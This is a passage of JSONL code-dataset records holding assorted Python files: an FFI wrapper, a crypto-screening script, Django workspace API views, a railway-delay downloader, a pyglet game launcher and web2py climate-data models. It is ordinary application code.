OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n\"\"\"\n\nimport os\nfrom sys import platform\nfrom ctypes import Structure, POINTER, c_void_p, c_size_t, c_double, cast, cdll\nimport numpy as np\n\nfile_path = os.path.dirname(__file__)\nprefix = {'win32': ''}.get(platform, 'lib')\nextension = {'darwin': '.dylib', 'win32': '.dll'}.get(platform, '.so')\n\nlib = cdll.LoadLibrary(os.path.join(file_path, \"target/release\", prefix + \"rdp\" + extension))\n\nclass _FFIArray(Structure):\n \"\"\"\n Convert sequence of float lists to a C-compatible void array\n example: [[1.0, 2.0], [3.0, 4.0]]\n\n \"\"\"\n _fields_ = [(\"data\", c_void_p),\n (\"len\", c_size_t)]\n\n @classmethod\n def from_param(cls, seq):\n \"\"\" Allow implicit conversions \"\"\"\n return seq if isinstance(seq, cls) else cls(seq)\n\n def __init__(self, seq, data_type = c_double):\n self.data = cast(\n np.array(seq, dtype=np.float64).ctypes.data_as(POINTER(data_type)),\n c_void_p\n )\n self.len = len(seq)\n\n\nclass _CoordResult(Structure):\n \"\"\" Container for returned FFI coordinate data \"\"\"\n _fields_ = [(\"coords\", _FFIArray)]\n\ndef _void_array_to_nested_list(res, _func, _args):\n \"\"\" Dereference the FFI result to a list of coordinates \"\"\"\n try:\n shape = res.coords.len, 2\n ptr = cast(res.coords.data, POINTER(c_double))\n array = np.ctypeslib.as_array(ptr, shape)\n return array.tolist()\n finally:\n drop_array(res.coords)\n\nsimplify_coords = lib.simplify_rdp_ffi\nsimplify_coords.argtypes = (_FFIArray, c_double)\nsimplify_coords.restype = _CoordResult\nsimplify_coords.errcheck = _void_array_to_nested_list\n\nsimplify_coords_vw = lib.simplify_visvalingam_ffi\nsimplify_coords_vw.argtypes = (_FFIArray, c_double)\nsimplify_coords_vw.restype = _CoordResult\nsimplify_coords_vw.errcheck = _void_array_to_nested_list\n\nsimplify_coords_vwp = lib.simplify_visvalingamp_ffi\nsimplify_coords_vwp.argtypes = (_FFIArray, c_double)\nsimplify_coords_vwp.restype = _CoordResult\nsimplify_coords_vwp.errcheck = _void_array_to_nested_list\n\ndrop_array = lib.drop_float_array\ndrop_array.argtypes = (_FFIArray,)\ndrop_array.restype = None\n\nif __name__ == \"__main__\":\n print(simplify_coords(\n [[0.0, 0.0], [5.0, 4.0], [11.0, 5.5], [17.3, 3.2], [27.8, 0.1]],\n 1.0\n ))\n","sub_path":"ffi.py","file_name":"ffi.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"28477159","text":"\"\"\"The hello command.\"\"\"\n\nfrom json import dumps\nfrom .base import Base\nfrom .utils import *\n\n\n\nclass Fly(Base):\n \"\"\"Jagging the scribble\"\"\"\n\n def run(self):\n print('This command takes an md file and jaggers it!')\n print('You supplied the following options:', dumps(self.options, indent=2, sort_keys=True))\n\n resource = self.options['']\n files_to_jagger = list()\n if os.path.isdir(resource):\n files_to_jagger = [f for f in os.listdir(resource) if assertMdFile(f)]\n elif assertMdFile(resource):\n files_to_jagger.append(resource)\n if not files_to_jagger:\n print(\"The path provided is not pointing to a valid md-File: {}\".format(resource))\n exit(-1)\n print(files_to_jagger)\n\n for file_path in files_to_jagger:\n jaggerFile(file_path)\n\n\n","sub_path":"jagger/commands/fly.py","file_name":"fly.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419954607","text":"# this screen implements bullish kickstarter, macd growth and bollinger. this screens volatility with bollinger\nimport get_positive_coin\nfrom pyti.bollinger_bands import middle_bollinger_band as mbb\nfrom pyti.bollinger_bands import lower_bollinger_band as lbb\nfrom pyti.bollinger_bands import upper_bollinger_band as ubb\nfrom pyti.moving_average_convergence_divergence import moving_average_convergence_divergence as macd\nfrom moving_average_convergence_divergence_signal_histogram import macd_signal as macds\nfrom moving_average_convergence_divergence_signal_histogram import macd_histogram as macdh\nfrom binance.client import Client\n\n\ndef screen():\n client = Client(\"api-key\", \"api-secret\", {\"verify\": False, \"timeout\": 20})\n positiveCoin = get_positive_coin.positiveCoin\n bullishKScoin = []\n for m in positiveCoin:\n candles = client.get_klines(symbol=m, interval=client.KLINE_INTERVAL_30MINUTE)\n if candles[-2][1] < candles[-2][4] <= candles[-1][1] < candles[-1][4]:\n bullishKScoin.append(m)\n\n macdCoin = []\n # for m in bullishKScoin:\n # candles = client.get_klines(symbol=m, interval=client.KLINE_INTERVAL_1HOUR)\n # close = []\n # for n in candles:\n # close.append(float(n[4]))\n # mac = macd(close, 12, 26)\n # macs = macds(mac)\n # mach = macdh(mac, macs)\n # # if mach[-1] > 0 and (macs[-1] - macs[-2]) > 0 and (mac[-1] - mac[-2]) > 0:\n # # macdCoin.append(m)\n # if mach[-1] > 0 and (macs[-1] - macs[-2]) > 0 and (mac[-1] - mac[-2]) > 0:\n # macdCoin.append(m)\n\n bollCoin = []\n for m in bullishKScoin:\n candles = client.get_klines(symbol=m, interval=client.KLINE_INTERVAL_1HOUR)\n close = []\n for n in candles:\n close.append(float(n[4]))\n lb = lbb(close, 20, 2)\n mb = mbb(close, 20, 2)\n ub = ubb(close, 20, 2)\n\n if ((ub[-1] - lb[-1])/lb[-1]) > 0.1:\n bollCoin.append(m)\n\n maxDemandRatio = 0\n buyingCoin = ''\n for m in bollCoin:\n depth = client.get_order_book(symbol=m)\n buyingVol = 0\n sellingVol = 0\n for n in depth['bids'][0:30]:\n buyingVol = buyingVol + float(n[1])\n for n in depth['asks'][0:30]:\n sellingVol = sellingVol + float(n[1])\n demandRatio = buyingVol / sellingVol\n print(demandRatio)\n print(maxDemandRatio)\n if demandRatio > maxDemandRatio:\n maxDemandRatio = demandRatio\n buyingCoin = m\n\n if maxDemandRatio < 1.5:\n buyingCoin = ''\n\n print(bullishKScoin)\n print(macdCoin)\n print(bollCoin)\n print(buyingCoin)\n return buyingCoin\n","sub_path":"screen3.py","file_name":"screen3.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402658463","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Babel localisation support for aiohttp\n 代码从 https://github.com/jie/aiohttp_babel 拷贝并修改\n\"\"\"\nfrom setuptools import setup\nfrom setuptools import find_packages\nimport os\n\ndef read(f):\n return open(os.path.join(os.path.dirname(__file__), f),encoding='utf8').read().strip()\n\nsetup(\n name = \"mw-aiohttp-babel\",\n version = \"0.1.7\",\n packages = find_packages(),\n install_requires = [\n \"aiohttp\",\n \"babel\",\n \"speaklater\",\n ],\n author = \"cxhjet\",\n author_email = \"cxhjet@qq.com\",\n description = \"Babel localisation support for aiohttp,适用maxwin团队的开发框架\",\n long_description='\\n\\n'.join((read('README.rst'), read('CHANGES.txt'))),\n license = \"BSD\",\n keywords = \"aiohttp locale babel localisation\",\n url = \"https://bitbucket.org/maxwin-inc/mw-aiohttp-babel/src\",\n)\n","sub_path":"pypi_install_script/mw-aiohttp-babel-0.1.7.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"377272353","text":"import mysql.connector\nfrom ptx import PTX\nfrom dotenv import load_dotenv\nfrom os import environ as ENV\n\n\nload_dotenv()\n\nptx = PTX(ENV['APP_ID'], ENV['APP_KEY'])\nresponse_data = ptx.get('/Rail/TRA/LiveTrainDelay', {'$format': 'JSON'}).json()\n\nconn = mysql.connector.connect(user=ENV['DB_USER'], password=ENV['DB_PASSWORD'],\n host=ENV['DB_HOST'], port=ENV['DB_PORT'],\n database=ENV['DB_NAME'])\ncursor = conn.cursor()\n\ndb_creation_sql = '''\n CREATE TABLE IF NOT EXISTS\n delay_infos (\n train_id INT,\n station_id INT,\n delay_time INT,\n updated_at TIMESTAMP,\n PRIMARY KEY (train_id, station_id, updated_at)\n )\n'''\ncursor.execute(db_creation_sql)\n\ninsertion_sql = '''\n INSERT IGNORE INTO delay_infos\n (train_id, station_id, delay_time, updated_at)\n VALUES\n (%s, %s, %s, %s)\n'''\n\nfor entry in response_data:\n delay_time = int(entry['DelayTime'])\n\n train_id = int(entry['TrainNo'])\n station_id = int(entry['StationID'])\n updated_at = entry['SrcUpdateTime']\n params = (train_id, station_id, delay_time, updated_at)\n cursor.execute(insertion_sql, params)\n\nconn.commit()\n\ncursor.close()\nconn.close()\n","sub_path":"download_delay_info.py","file_name":"download_delay_info.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"566105188","text":"from typing import List\n\n# if I have a sub list of ascending order, it's the smallest value\n# find inversion point just before the sub list\n# swap the biggest val in sub list that < inversion\n# reverse the sub list to make it biggest\n\ndef prev_permutation(perm: List[int]) -> List[int]:\n # find inversion point perm[i] > perm[i+1]\n i = len(perm) - 2\n while (i >= 0 and perm[i] <= perm[i+1]):\n i -= 1\n\n if i == -1:\n return []\n\n # swap perm[i] with biggest val after perm[i]\n # that < perm[i]\n for j in reversed(range(len(perm))):\n if perm[j] < perm[i]:\n perm[j], perm[i] = perm[i], perm[j]\n break\n\n perm[i+1:] = reversed(perm[i+1:])\n return perm\n \nif __name__ == '__main__':\n for perm in ([0,1,2], [2,1,0], [0,2,1]):\n print(prev_permutation(perm))","sub_path":"list/prev_permutation.py","file_name":"prev_permutation.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"460233416","text":"# Copyright 2019 NEC Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport cgi # CGIモジュールのインポート\nimport cgitb\nimport sys\nimport requests\nimport json\nimport subprocess\nimport traceback\nimport os\nimport datetime, pytz\nimport time\nimport shutil\nimport logging\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.http import require_http_methods\n\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom kubernetes import client, config\n\nlogger = logging.getLogger('apilog')\napp_name = \"\"\nexec_stat = \"\"\nexec_detail = \"\"\n\n@require_http_methods(['POST'])\n@csrf_exempt\ndef post(request):\n try:\n logger.debug(\"CALL workspace post\")\n app_name = \"ワークスペース作成:\"\n exec_stat = \"初期化\"\n exec_detail = \"\"\n\n # ヘッダ情報\n headers = {\n 'Content-Type': 'application/json',\n }\n\n # データ情報\n data = '{}'\n\n # パラメータ情報(JSON形式)\n payload = json.loads(request.body)\n\n # CiCd Api の呼び先設定\n apiInfo = \"{}://{}:{}/\".format(os.environ[\"EPOCH_CICD_PROTOCOL\"], os.environ[\"EPOCH_CICD_HOST\"], os.environ[\"EPOCH_CICD_PORT\"])\n output = []\n\n # post送信(argocd/pod作成)\n exec_stat = \"ArgoCDデプロイ\"\n response = requests.post(apiInfo + 'argocd/pod', headers=headers, data=data, params=payload)\n\n if isJsonFormat(response.text):\n # 取得したJSON結果が正常でない場合、例外を返す\n ret = json.loads(response.text)\n if ret[\"result\"] == \"OK\":\n output.append(ret[\"output\"])\n else:\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n raise Exception\n else:\n response = {\n \"result\": {\n \"code\": \"500\",\n \"detailcode\": \"\",\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"output\": response.text,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response,status=500)\n\n # post送信(ita/pod作成)\n exec_stat = \"Exastro IT Automationデプロイ\"\n response = requests.post(apiInfo + 'ita/', headers=headers, data=data, params=payload)\n\n # 取得したJSON結果が正常でない場合、例外を返す\n ret = json.loads(response.text)\n if ret[\"result\"] == \"OK\":\n output.append(ret[\"output\"])\n else:\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n raise Exception\n\n response = {\n \"result\": {\n \"code\": \"200\",\n \"detailcode\": \"\",\n \"output\": output,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response)\n\n except Exception as e:\n response = {\n \"result\": {\n \"code\": \"500\",\n \"detailcode\": \"\",\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"output\": traceback.format_exc(),\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response,status=500)\n\ndef isJsonFormat(line):\n try:\n json.loads(line)\n except json.JSONDecodeError as e:\n logger.debug(sys.exc_info())\n logger.debug(e)\n return False\n # 以下の例外でも捕まえるので注意\n except ValueError as e:\n logger.debug(sys.exc_info())\n logger.debug(e)\n return False\n except Exception as e:\n logger.debug(sys.exc_info())\n logger.debug(e)\n return False\n return True\n\n# @csrf_exempt\n# def conv(template_yaml, dest_yaml):\n\n# # 実行yamlの保存\n# shutil.copy(template_yaml, dest_yaml)\n\n# # 実行yamlを読み込む\n# with open(dest_yaml, encoding=\"utf-8\") as f:\n# data_lines = f.read()\n\n# epochImage = os.environ['EPOCH_CICD_IMAGE']\n# epochPort = os.environ['EPOCH_CICD_PORT']\n\n# # 文字列置換\n# data_lines = data_lines.replace(\"<__epoch_cicd_api_image__>\", epochImage)\n# data_lines = data_lines.replace(\"<__epoch_cicd_api_port__>\", epochPort)\n\n# # 同じファイル名で保存\n# with open(dest_yaml, mode=\"w\", encoding=\"utf-8\") as f:\n# f.write(data_lines)\n\n\n@require_http_methods(['GET','POST'])\n@csrf_exempt\ndef info_all(request):\n \"\"\"ワークスペース情報\n\n Args:\n request ([json]): 画面項目\n\n Returns:\n dict : workspace情報\n \"\"\"\n if request.method == 'POST':\n return info_all_post(request)\n else:\n return info_all_get(request)\n\n@csrf_exempt\ndef info_all_post(request):\n \"\"\"ワークスペース情報(POST)\n\n Args:\n request ([json]): 画面項目\n\n Returns:\n dict : workspace情報\n \"\"\"\n try:\n logger.debug (\"CALL \" + __name__)\n\n app_name = \"ワークスペース情報:\"\n exec_stat = \"初期化\"\n exec_detail = \"\"\n\n # ヘッダ情報\n post_headers = {\n 'Content-Type': 'application/json',\n }\n\n # 引数をJSON形式で受け取りそのまま引数に設定\n post_data = request.body\n\n # 呼び出すapiInfoは、環境変数より取得\n apiInfo = \"{}://{}:{}/\".format(os.environ[\"EPOCH_RS_WORKSPACE_PROTOCOL\"], os.environ[\"EPOCH_RS_WORKSPACE_HOST\"], os.environ[\"EPOCH_RS_WORKSPACE_PORT\"])\n\n # ワークスペース情報保存\n exec_stat = \"保存\"\n request_response = requests.post( apiInfo + \"workspace\", headers=post_headers, data=post_data)\n logger.debug(\"workspace:\" + request_response.text)\n ret = json.loads(request_response.text)\n #print(ret)\n if request_response.status_code == 500:\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n raise Exception\n \n # 戻り値をそのまま返却 \n return JsonResponse(ret, status=request_response.status_code)\n\n except Exception as e:\n response = {\n \"result\": {\n \"output\": traceback.format_exc(),\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=500)\n\ndef info_all_get(request):\n # sample\n response = {\n \"result\": {\n \"code\": \"200\",\n \"detailcode\": \"\",\n \"output\": \"Hello World. (Sample)\",\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response)\n\n@require_http_methods(['GET','PUT'])\n@csrf_exempt\ndef info(request, workspace_id):\n \"\"\"ワークスペース詳細取得(id指定)\n\n Args:\n request (HttpRequest): HTTP request\n workspace_id (int): ワークスペースID\n\n Returns:\n response: HTTP Respose\n \"\"\"\n if request.method == 'PUT':\n return info_put(request, workspace_id)\n else:\n return info_get(request, workspace_id)\n\n@csrf_exempt\ndef info_put(request, workspace_id):\n \"\"\"ワークスペース詳細取得\n\n Args:\n request (HttpRequest): HTTP request\n workspace_id (int): ワークスペースID\n\n Returns:\n response: HTTP Respose\n \"\"\"\n try:\n app_name = \"ワークスペース情報:\"\n exec_stat = \"初期化\"\n exec_detail = \"\"\n\n # ヘッダ情報\n headers = {\n 'Content-Type': 'application/json',\n }\n\n # 引数をJSON形式で受け取りそのまま引数に設定\n post_data = request.body\n\n # PUT送信(更新)\n resourceProtocol = os.environ['EPOCH_RS_WORKSPACE_PROTOCOL']\n resourceHost = os.environ['EPOCH_RS_WORKSPACE_HOST']\n resourcePort = os.environ['EPOCH_RS_WORKSPACE_PORT']\n apiInfo = \"{}://{}:{}/\".format(resourceProtocol, resourceHost, resourcePort)\n request_response = requests.put(apiInfo + 'workspace/' + str(workspace_id), headers=headers, data=post_data)\n ret = json.loads(request_response.text)\n\n if request_response.status_code == 500:\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n raise Exception\n\n # 戻り値をそのまま返却 \n return JsonResponse(ret, status=request_response.status_code)\n\n except Exception as e:\n response = {\n \"result\": {\n \"code\": \"500\",\n \"detailcode\": \"\",\n \"output\": traceback.format_exc(),\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=500)\n\n@csrf_exempt\ndef info_get(request, workspace_id):\n \"\"\"ワークスペース詳細取得\n\n Args:\n request (HttpRequest): HTTP request\n workspace_id (int): ワークスペースID\n\n Returns:\n response: HTTP Respose\n \"\"\"\n try:\n # ヘッダ情報\n headers = {\n 'Content-Type': 'application/json',\n }\n\n # GET送信(作成)\n resourceProtocol = os.environ['EPOCH_RS_WORKSPACE_PROTOCOL']\n resourceHost = os.environ['EPOCH_RS_WORKSPACE_HOST']\n resourcePort = os.environ['EPOCH_RS_WORKSPACE_PORT']\n apiInfo = \"{}://{}:{}/\".format(resourceProtocol, resourceHost, resourcePort)\n response = requests.get(apiInfo + 'workspace/' + str(workspace_id), headers=headers)\n\n output = []\n if response.status_code == 200 and isJsonFormat(response.text):\n # 取得したJSON結果が正常でない場合、例外を返す\n ret = json.loads(response.text)\n output = ret[\"rows\"]\n elif response.status_code == 404:\n response = {\n \"result\": {\n \"detailcode\": \"\",\n \"output\": response.text,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=404)\n else:\n if response.status_code == 500 and isJsonFormat(response.text):\n # 戻り値がJsonの場合は、値を取得\n ret = json.loads(response.text)\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n\n response = {\n \"result\": {\n \"detailcode\": \"\",\n \"output\": response.text,\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=500)\n\n response = {\n \"result\": {\n \"detailcode\": \"\",\n \"output\": output,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=200)\n\n except Exception as e:\n response = {\n \"result\": {\n \"code\": \"500\",\n \"detailcode\": \"\",\n \"output\": traceback.format_exc(),\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=500)\n","sub_path":"epochServiceApi/workspace/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83896716","text":"\"\"\"\nThe module game is part of RoboProject by Pyladies Brno.\n\nKey library is pyglet Python library https://bitbucket.org/pyglet/pyglet/wiki/Home\nThis module imports the backend and frontend modules.\n\nThe game module\n - imports pyglet library, backend and frontend modules\n - provides arguments for map size\n - loads specific JSON map with 12x12 tiles with the size 64x64 px\n - calls pyglet window\n - calls various backend and frontend functions\n - draws the game map and runs pyglet\n\"\"\"\n\nimport backend\nimport frontend\nimport pyglet\n\n# definition of game board tiles and their size:\nTILE_WIDTH = 64\nTILE_HEIGHT = 64\nWINDOW_WIDTH = 12*TILE_WIDTH\nWINDOW_HEIGHT = 12*TILE_HEIGHT\n\n# loading JSON map data from the backend module\nmap_name = \"./maps/test_3.json\"\ndata = backend.get_data(map_name)\n\n# loading pyglet graphic window from the frontend module\nwindow = frontend.init_window(WINDOW_WIDTH, WINDOW_HEIGHT)\n\n# calling functions from the backend module to draw the game board\ncoordinates = backend.get_coordinates(data)\ntilelist = backend.get_tiles(data)\nstate = backend.get_coordinate_dict(coordinates, tilelist)\n\n# loading pyglet sprites by the frontend module\nimages = frontend.load_images(data, state, TILE_WIDTH, TILE_HEIGHT)\n\n\n@window.event\ndef on_draw():\n \"\"\"\n this function clears the graphic window\n and finally draws the board game\n \"\"\"\n window.clear()\n frontend.draw_board(state, images)\n\n# this runs the pyglet library\npyglet.app.run()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"79396347","text":"# -*- coding: utf-8 -*-\n\n__doc__ = \"\"\"Climate data portal models\n\nClimate data is stored in dynamically created tables.\nThese tables can be added from the command line script add_table.py\nin modules.ClimateDataPortal.\nThe table definitions are stored in climate_sample_table_spec.\n\nA data is an observed value over a time quantum at a given place.\n\ne.g. observed temperature in Kathmandu between Feb 2006 - April 2007\n\nPlaces are currently points, i.e. lat/lon coordinates.\nPlaces may be stations.\nPlaces may have elevation or other optional information.\n\n\"\"\"\n\n\nmodule = \"climate\"\n\nif deployment_settings.has_module(\"climate\"):\n climate_first_run_sql = []\n def climate_first_run():\n for sql in climate_first_run_sql:\n db.executesql(sql)\n db.commit()\n\n def climate_define_table(name, fields, attrs = None):\n if attrs is None:\n attrs = {}\n return db.define_table(\n \"climate_\"+name,\n *fields,\n **attrs\n )\n\n # @ToDo: would be great if we had a table that could represent\n # places. gis_location doesn't fit the bill as there are so many\n # other fields that climate doesn't use.\n # elevation is not included as it would just mean a performance hit\n # when we are generating 2D maps without elevation info.\n climate_place = climate_define_table(\n \"place\",\n (\n # @ToDo: change into GIS point\n Field(\n \"longitude\",\n \"double\",\n notnull=True,\n required=True,\n ),\n Field(\n \"latitude\",\n \"double\",\n notnull=True,\n required=True,\n )\n )\n )\n\n def place_attribute_table(\n attribute_table_name,\n fields\n ):\n return climate_define_table(\n \"place_\"+attribute_table_name,\n fields\n )\n\n # elevation may not be useful for future projects\n # e.g. where not available, or sea-based stations\n # also, elevation may be supplied for gridded data\n climate_elevation = place_attribute_table(\n \"elevation\",\n (\n Field(\n \"elevation_metres\",\n \"double\",\n notnull=True,\n required=True,\n ),\n )\n )\n\n # not all places are stations with elevations\n # as in the case of \"gridded\" data\n # a station can only be in one place\n climate_station_name = place_attribute_table(\n \"station_name\",\n (\n Field(\n \"name\",\n \"string\",\n notnull=True,\n required=True,\n ),\n )\n )\n\n # station id may not be useful or even meaningful\n # e.g. gridded data has no stations.\n # this is passive data so ok to store separately\n climate_station_id = place_attribute_table(\n \"station_id\",\n (\n Field(\n \"station_id\",\n \"integer\",\n notnull=True,\n required=True,\n ),\n )\n )\n\n def station_represent(id):\n row_id = db(climate_station_id.station_id == id).select(\n climate_station_id.station_id,\n limitby=(0,1)\n ).first()\n row_name = db(climate_station_name.id == id).select(\n climate_station_name.name,\n limitby=(0,1)\n ).first()\n \n if row_id and row_id.station_id:\n represent = \" (%s)\" % row_id.station_id\n else:\n represent = \"\"\n if row_name and row_name.name:\n represent = \"%s%s\" % (row_name.name, represent)\n \n return represent or NONE\n \n \n station_id = S3ReusableField(\n \"station_id\", \n climate_station_name, \n sortby=\"name\",\n requires = IS_ONE_OF(\n db,\n \"climate_place_station_name.id\",\n station_represent,\n orderby=\"climate_place_station_name.name\",\n sort=True\n ),\n represent = station_represent,\n label = \"Station\",\n ondelete = \"RESTRICT\"\n )\n\n # coefficient of variance is meaningless for degrees C but Ok for Kelvin\n # internally all scales must be ratio scales if coefficient \n # of variations is to be allowed, (which it is)\n # rainfall (mm), temp (K) are ok\n # output units \n \n climate_sample_table_spec = climate_define_table(\n \"sample_table_spec\",\n (\n Field(\n \"name\",\n \"string\",\n notnull=True,\n required=True,\n ),\n Field(\n \"sample_type_code\",\n \"string\",\n length = 1,\n notnull = True,\n # web2py requires a default value for not null fields\n default = \"\",\n required = True\n ),\n Field(\n \"field_type\",\n \"string\",\n notnull=True,\n required=True,\n ),\n Field(\n \"units\",\n \"string\",\n notnull=True,\n required=True,\n ),\n Field(\n \"date_mapping\",\n \"string\",\n default=\"\",\n notnull=True,\n required=True\n ),\n Field(\n \"grid_size\",\n \"double\",\n default = 0,\n notnull = True,\n required = True\n )\n ),\n )\n \n def sample_table_spec_represent(id):\n table = db.climate_sample_table_spec\n row = db(table.id == id).select(\n table.name,\n table.sample_type_code,\n limitby=(0, 1)\n ).first()\n if row:\n return \"%s %s\" % (\n ClimateDataPortal.sample_table_types_by_code[row.sample_type_code].__name__, \n row.name\n )\n else:\n return NONE\n \n parameter_id = S3ReusableField(\n \"parameter_id\", \n db.climate_sample_table_spec, \n sortby=\"name\",\n requires = IS_ONE_OF(\n db,\n \"climate_sample_table_spec.id\",\n sample_table_spec_represent,\n sort=True\n ),\n represent = sample_table_spec_represent,\n label = \"Parameter\",\n# script = SCRIPT(\n#\"\"\"\n#S3FilterFieldChange({\n# 'FilterField': 'sample_type_code',\n# 'Field': 'parameter_id',\n# 'FieldResource':'sample_table_spec',\n# 'FieldPrefix': 'climate',\n#});\"\"\"),\n ondelete = \"RESTRICT\"\n )\n\n climate_first_run_sql.append(\n \"ALTER TABLE climate_sample_table_spec\"\n \" ADD CONSTRAINT climate_sample_table_name_sample_type_unique\"\n \" UNIQUE (name, sample_type_code);\"\n )\n\n climate_monthly_aggregation_table_spec = climate_define_table(\n \"monthly_aggregation\",\n (\n Field(\n \"sample_table_id\",\n climate_sample_table_spec,\n notnull = True,\n required = True\n ),\n Field(\n # this maps to the name of a python class\n # that deals with the monthly aggregated data.\n \"aggregation\",\n \"string\",\n notnull=True,\n required=True,\n )\n )\n )\n\n # =====================================================================\n # Station Parameters\n #\n resourcename = \"station_parameter\"\n tablename = \"climate_station_parameter\"\n table = db.define_table(\n tablename,\n station_id(),\n parameter_id(\n requires = IS_ONE_OF(\n db,\n \"climate_sample_table_spec.id\",\n sample_table_spec_represent,\n sort=True\n ),\n script = None\n ),\n )\n \n # Add virtual fields for range: from - to\n \n \n\n # CRUD strings\n ADD_STATION_PARAMETER = T(\"Add Station Parameter\")\n LIST_STATION_PARAMETER = T(\"List Station Parameters\")\n s3.crud_strings[tablename] = Storage(\n title_create = ADD_STATION_PARAMETER,\n title_display = T(\"Station Parameter Details\"),\n title_list = LIST_STATION_PARAMETER,\n title_update = T(\"Edit Station Parameter\"),\n title_search = T(\"Search Station Parameters\"),\n subtitle_create = ADD_STATION_PARAMETER,\n subtitle_list = T(\"Station Parameters\"),\n label_list_button = LIST_STATION_PARAMETER,\n label_create_button = ADD_STATION_PARAMETER,\n label_delete_button = T(\"Remove Station Parameter\"),\n msg_record_created = T(\"Station Parameter Added\"),\n msg_record_modified = T(\"Station Parameter updated\"),\n msg_record_deleted = T(\"Station Parameter removed\"),\n msg_list_empty = T(\"No Station Parameters currently registered\")\n )\n \n\n # Virtual Field for pack_quantity\n class station_parameters_virtualfields(dict, object):\n def range_from(self):\n query = (\n \"SELECT MIN(time_period) \"\n \"from climate_sample_table_%(parameter_id)i \"\n \"WHERE place_id = %(station_id)i;\"\n ) % dict(\n parameter_id = self.climate_station_parameter.parameter_id,\n station_id = self.climate_station_parameter.station_id,\n )\n date = db.executesql(query)[0][0]\n if date is not None:\n year,month = ClimateDataPortal.month_number_to_year_month(date)\n return \"%s-%s\" % (month, year)\n else:\n return NONE\n \n \n \n #\"Now station_id=%s parameter_id=%s\" % (\n # self.climate_station_parameter.station_id,\n # self.climate_station_parameter.parameter_id)\n def range_to(self):\n query = (\n \"SELECT MAX(time_period) \"\n \"from climate_sample_table_%(parameter_id)i \"\n \"WHERE place_id = %(station_id)i;\"\n ) % dict(\n parameter_id = self.climate_station_parameter.parameter_id,\n station_id = self.climate_station_parameter.station_id,\n )\n date = db.executesql(query)[0][0]\n if date is not None:\n 